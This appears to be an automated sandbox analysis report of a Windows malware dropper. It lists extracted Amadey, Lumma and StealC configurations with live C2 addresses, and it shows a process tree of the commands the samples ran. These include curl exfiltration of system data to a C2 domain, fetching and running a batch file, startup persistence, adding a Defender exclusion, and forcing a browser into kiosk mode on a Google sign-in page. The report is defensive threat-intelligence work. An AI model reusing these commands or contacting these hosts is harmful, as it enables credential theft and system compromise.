Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 11:50

General

  • Target

    697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe

  • Size

    3.1MB

  • MD5

    326a64b31756243c9d480b7d9ee2b710

  • SHA1

    c82a3fa741caf754a04adf6a900741bdbd17af75

  • SHA256

    697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280

  • SHA512

    42ab7d47003c972c419770e58a50566c8f92c22ccac150d222434fad537d6285f465a60fe15049cda266af22eb4999af88a758ca020e0e4f052f5fc5345d96b3

  • SSDEEP

    49152:vvKkav8COhbF3UAFYcfMHO884bFGj18M77D7nj37A02unD:vveabF3UAYcEHtBF0d7zjR2mD

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe
    "C:\Users\Admin\AppData\Local\Temp\697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe
        "C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4632
        • C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2504
      • C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe
        "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4120
          • C:\Windows\SysWOW64\systeminfo.exe
            systeminfo
            5⤵
            • System Location Discovery: System Language Discovery
            • Gathers system information
            PID:5016
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3624
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3512
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4132
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:2900
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3888
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:464
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1068
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1524
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:5336
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5352
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5604
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:6112
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3388
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:2800
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4936
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5008
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:892
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5656
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:3172
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2428
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:948
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1952
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3828
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:5368
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2900
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5356
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1728
      • C:\Users\Admin\AppData\Local\Temp\1014365001\W4KLQf7.exe
        "C:\Users\Admin\AppData\Local\Temp\1014365001\W4KLQf7.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5052
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2300
        • C:\Windows\SysWOW64\systeminfo.exe
          systeminfo
          4⤵
          • System Location Discovery: System Language Discovery
          • Gathers system information
          PID:3388
      • C:\Users\Admin\AppData\Local\Temp\1014377001\c700dec7dc.exe
        "C:\Users\Admin\AppData\Local\Temp\1014377001\c700dec7dc.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4256
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 576
          4⤵
          • Program crash
          PID:1644
      • C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe
        "C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3196
        • C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe
          "C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"
          4⤵
          • Executes dropped EXE
          PID:5016
        • C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe
          "C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4576
      • C:\Users\Admin\AppData\Local\Temp\1014379001\6ce0a63070.exe
        "C:\Users\Admin\AppData\Local\Temp\1014379001\6ce0a63070.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1436
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014379001\6ce0a63070.exe" & rd /s /q "C:\ProgramData\XBA1N7QQIMO8" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1428
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 10
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:4880
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 2052
          4⤵
          • Program crash
          PID:4908
      • C:\Users\Admin\AppData\Local\Temp\1014380001\ebde0dba70.exe
        "C:\Users\Admin\AppData\Local\Temp\1014380001\ebde0dba70.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3060
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3836
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4684
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4540
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:440
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4748
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:3984
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:4972
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {08f4e28b-08d7-43c0-aa51-00dfa71d73d2} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" gpu
                6⤵
                  PID:1940
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3eb39911-1589-474a-91ed-bfd8283d4588} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" socket
                  6⤵
                    PID:4904
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3160 -childID 1 -isForBrowser -prefsHandle 3152 -prefMapHandle 3148 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d486d5d9-8956-4f6f-902e-7bf0f48e31fd} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab
                    6⤵
                      PID:1868
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3796 -childID 2 -isForBrowser -prefsHandle 3788 -prefMapHandle 3784 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {838a367a-5545-4ad0-80d7-92c259be4b60} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab
                      6⤵
                        PID:3928
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4728 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4736 -prefMapHandle 4668 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a441670-460f-4a12-87c2-48509da7dad2} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" utility
                        6⤵
                        • Checks processor information in registry
                        PID:5500
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5380 -prefMapHandle 5376 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47404e77-e972-4b67-a265-895c4d439edc} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab
                        6⤵
                          PID:3264
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 4 -isForBrowser -prefsHandle 5528 -prefMapHandle 5536 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7bb04005-dd49-433a-b2e0-cf7e3cc0a054} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab
                          6⤵
                            PID:4992
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 5 -isForBrowser -prefsHandle 5792 -prefMapHandle 5344 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22fb39e7-8df5-4f53-b3c7-3a1cda2a0893} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab
